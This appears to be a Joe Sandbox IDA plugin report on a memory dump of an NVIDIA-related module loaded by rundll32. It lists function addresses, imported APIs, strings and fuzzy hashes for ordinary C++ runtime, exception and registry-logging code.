Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: __std_exception_copy$CriticalEnterInit_thread_footerSection
String ID: C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 573191702-11599673
Opcode ID: c8e7ba5cae92af93b3c630c6545702cbbcee4c59c37fe349bfe9bc53d1de58af
Instruction ID: 9eeb9555be35b43b365135a0aa98f510fa5ee582d895bf85868f96c7c918ebd9
Opcode Fuzzy Hash: c8e7ba5cae92af93b3c630c6545702cbbcee4c59c37fe349bfe9bc53d1de58af
Instruction Fuzzy Hash: 0B515B32B15F0289EB14CF20E8606A833B5FB48758F804176CA6D537E9EF38E555C380

Function 00007FFDFA8C25A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C262E

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

new.LIBCMT ref: 00007FFDFA8C2636
new.LIBCMT ref: 00007FFDFA8C2649
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C26A1

Strings

NVSvc, xrefs: 00007FFDFA8C25B0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$Concurrency::cancel_current_taskDeallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID: NVSvc
API String ID: 599641635-212025136
Opcode ID: ddfb7c14704bbdd184cdc107adc100f4006795ee5e6cc2a799b7c14b2eb6ff3c
Instruction ID: 8278336345af33259469d827bab1fe8ba971fa73ba1f074904b86496df16ec80
Opcode Fuzzy Hash: ddfb7c14704bbdd184cdc107adc100f4006795ee5e6cc2a799b7c14b2eb6ff3c
Instruction Fuzzy Hash: 7E319172B19A0141FB1CAB259164BA822919B20FE4F514272CE3D073DDEFB8E8928790

Function 00007FFDFA8A1230 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32 ref: 00007FFDFA8A128C
GetLastError.KERNEL32 ref: 00007FFDFA8A1296
GetCurrentThreadId.KERNEL32 ref: 00007FFDFA8A12C1

Strings

NVSvc, xrefs: 00007FFDFA8A136C
NVSvc, xrefs: 00007FFDFA8A1356, 00007FFDFA8A1365

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalCurrentErrorInitializeLastSectionThread
String ID: NVSvc$NVSvc
API String ID: 2717818847-2528201179
Opcode ID: aac702937f99b46e52630d0b9ec367870328485319eb568c52d351bc7885fa4d
Instruction ID: 8c7a08f7b252d3889b0d0493b33de0228985174414e0f55032b5d1b9b052ebdf
Opcode Fuzzy Hash: aac702937f99b46e52630d0b9ec367870328485319eb568c52d351bc7885fa4d
Instruction Fuzzy Hash: F0412A31B2CB6385F7088B14E860A7533A4AF48748F9401B6C97D466ECEF7CA55BC350

Function 00007FFDFA8B3A6C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDFA8B3AA1
RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8B3ABC

Part of subcall function 00007FFDFA8B3848: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B38F2
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3915
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3941
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3965
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3989

Part of subcall function 00007FFDFA8C3874: throw_exception.LIBCPMT ref: 00007FFDFA8C3900

Strings

c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FFDFA8B3AF3
RegOpenKeyEx, xrefs: 00007FFDFA8B3AC8
void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FFDFA8B3AFA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_$CloseOpen__std_exception_copythrow_exception
String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
API String ID: 239400870-1403648629
Opcode ID: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
Instruction ID: b5116b22b1571f445f9843df342a2fbaebd8200ab32a70879f40ceae8777382d
Opcode Fuzzy Hash: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
Instruction Fuzzy Hash: AE11B932714A8282EB14CB25E460B6973A0FF49B94F804132DA6D87BEDDF7CD155C740

Function 00007FFDFA8BCE50 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8BD0FF

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8BD105

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 3870983325-0
Opcode ID: 692856dc93f02fb6b30b6d0bfdf8b4654916753a3c4be994db817afdf7bea135
Instruction ID: 21c5f53499af4cdfb2c421d95b8cb2692434f55b6152f8476a939654779fa67f
Opcode Fuzzy Hash: 692856dc93f02fb6b30b6d0bfdf8b4654916753a3c4be994db817afdf7bea135
Instruction Fuzzy Hash: D4A125B2B15B4981DB188F29C0A462C77A5FB48FC8B918162CF6D477E8DFB9D452C390

Function 00007FFDFA998C7C Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA998CBD
GetConsoleMode.KERNEL32(?,?,?,?,00BFBBEF,00000003,00000000,?,00000003,00000000,?,00007FFDFA998C3B), ref: 00007FFDFA998D7C
GetLastError.KERNEL32(?,?,?,?,00BFBBEF,00000003,00000000,?,00000003,00000000,?,00007FFDFA998C3B), ref: 00007FFDFA998DFC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 63b57b7d45167d8fa92291cfbf38f0a5e878b0f6e9745c8e0b648f01911fb70c
Instruction ID: b7484a7bcfddf11dec4c3cfff23ce77a412acbd7f96c090be71a1d387463307b
Opcode Fuzzy Hash: 63b57b7d45167d8fa92291cfbf38f0a5e878b0f6e9745c8e0b648f01911fb70c
Instruction Fuzzy Hash: 2181A222F1861265F718AB659470ABC26A0FF48B8CFC481B9DA2E977D9DF3CB445C310

Function 00007FFDFA8C3E40 Relevance: 7.7, APIs: 5, Instructions: 191COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C40C1

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C40C7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 3870983325-0
Opcode ID: 5d97f90830bdbf06ec5746e90f06d3113653bcb5d3ac2bcbf1c01b953463c062
Instruction ID: cc09673ff70d525eab5acf6a66bd498e7c8240d17b56fb3719fb788a3b35d2ee
Opcode Fuzzy Hash: 5d97f90830bdbf06ec5746e90f06d3113653bcb5d3ac2bcbf1c01b953463c062
Instruction Fuzzy Hash: 3C718A32B15B1981EB198F6AC06492C77A0FB54FD8B818562CF6D077E8CF78E492C340

Function 00007FFDFA99559C Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDFA9955D8
_set_statfp.LIBCMT ref: 00007FFDFA9955F6
_set_statfp.LIBCMT ref: 00007FFDFA99561F
_set_statfp.LIBCMT ref: 00007FFDFA9957D8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
Instruction ID: c897c7b1e4a78357784459c93915f95a9a63ccd60a909b1995a7a077528d47e2
Opcode Fuzzy Hash: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
Instruction Fuzzy Hash: A2516B26F0CE46A1F72A9F34D470B3B6258BF08358F8482B5E97D965DCDF3CA5898600

Function 00007FFDFA8DAD98 Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8DAE38
new.LIBCMT ref: 00007FFDFA8DAE4B
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8DAF06
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8DAF30
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8DAF36

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: 08b7a25d5c0213560c5cc70f4715025051cbb6d53cec4cbdcaa05d004deb51ae
Instruction ID: 0cc319cfbe4cbb0ee64e06bf9551d6e8f8df4f517950d4140df734910550c5ee
Opcode Fuzzy Hash: 08b7a25d5c0213560c5cc70f4715025051cbb6d53cec4cbdcaa05d004deb51ae
Instruction Fuzzy Hash: F641E462B2968641EB08DB62D4209B9A710AF44BE4F544B71EE3D0BBCECE7CD142C340

Function 00007FFDFA90EB60 Relevance: 7.6, APIs: 5, Instructions: 121COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA90EC01
new.LIBCMT ref: 00007FFDFA90EC14
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90ECCF
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90ECF9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90ECFF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: bce1828b30ddff2646d4b3d03e110bfbd4bae33fed3a8440b1ab4f83ccd5ec7d
Instruction ID: 4d4ef46b66a2d2e7f1fdbd4cf02c95ee47719e5b031c0bc136021060e3d470a0
Opcode Fuzzy Hash: bce1828b30ddff2646d4b3d03e110bfbd4bae33fed3a8440b1ab4f83ccd5ec7d
Instruction Fuzzy Hash: 1541E566B096A642FF18DB76D4209B96711AF44BE0F888675EE3D47BCDCE7CD1418340

Function 00007FFDFA908AD8 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA908B75
new.LIBCMT ref: 00007FFDFA908B88
std::_Deallocate.LIBCONCRT ref: 00007FFDFA908C43
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908C6D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908C73

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: 29d4830251616cdd268c2bf75ab48976087fe14dc573545c4f9bd2489b59448d
Instruction ID: ace119224b698e94d1fa86edc85e03876a9d1a052b43cae5c925e8e1c8e95e6d
Opcode Fuzzy Hash: 29d4830251616cdd268c2bf75ab48976087fe14dc573545c4f9bd2489b59448d
Instruction Fuzzy Hash: AF41E466B0969241EF08DA76D4205B96710EF44BE4F88CA71EE7D4BBCECE3CE1428340

Function 00007FFDFA912C10 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA912CAD
new.LIBCMT ref: 00007FFDFA912CC0
std::_Deallocate.LIBCONCRT ref: 00007FFDFA912D7B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA912DA5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA912DAB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: a5da996f56c2682e203ea1f9b0e0bae5af7e48d76a0820d5e028d67075c90562
Instruction ID: 6d977aaf2115ee37b6c2763c38e0958e30eba3938bd628f83e994bbb7aa56c9f
Opcode Fuzzy Hash: a5da996f56c2682e203ea1f9b0e0bae5af7e48d76a0820d5e028d67075c90562
Instruction Fuzzy Hash: 2441D362F0978651EB08EB66E4605BA6350AF48FE0F844A75EE3D4BBCDCE3CD1428340

Function 00007FFDFA908930 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA9089CD
new.LIBCMT ref: 00007FFDFA9089E0
std::_Deallocate.LIBCONCRT ref: 00007FFDFA908A9B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908AC5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908ACB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
